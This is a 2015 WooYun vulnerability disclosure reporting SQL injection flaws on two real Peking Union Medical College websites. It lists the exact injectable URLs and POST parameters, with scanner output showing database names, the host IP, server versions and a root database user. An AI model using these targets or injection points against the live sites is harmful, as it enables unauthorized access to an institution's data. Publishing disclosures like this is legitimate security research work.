当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131993

漏洞标题:中国科学院某站多处SQL注入漏洞打包

相关厂商:CCERT教育网应急响应组

漏洞作者: M4sk

提交时间:2015-08-10 16:11

修复时间:2015-08-15 16:12

公开时间:2015-08-15 16:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

# 中国医学科学院基础医学研究所&北京协和医学院基础医学院
# http://sbm.pumc.edu.cn
http://sbm.pumc.edu.cn/Article_Shows.asp?photoid=276
还有2处POST注入:
URL:http://sbm.pumc.edu.cn/User_ChkLogin.asp
POST DATA:
Password=test&Login=%EF%BF%BD%EF%BF%BD%20%C2%BC&CookieDate=0&UserName=test
URL:http://sbm.pumc.edu.cn/vote.asp
POST DATA:
VoteType=Single&Action=Vote&ID=5&VoteOption=1

available databases [8]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] pumcdate
[*] tempdb
[*] tongzhandate


1.png


# 中国协和医科大学院校报电子版《中国协和医科大学院报》
http://ykyyb.pumc.edu.cn/remark.php?doc_id=3283

Target: 		http://ykyyb.pumc.edu.cn/remark.php?doc_id=3283
Host IP: 124.17.96.99
Web Server: Apache/2.0.59 (Win32) PHP/5.0.4
Powered-by: PHP/5.0.4
DB Server: MySQL
Resp. Time(avg): 86 ms
Current User: root@localhost
Sql Version: 4.0.25-debug
Current DB: epaper
System User: root@localhost


漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-15 16:12

厂商回复:

最新状态:

暂无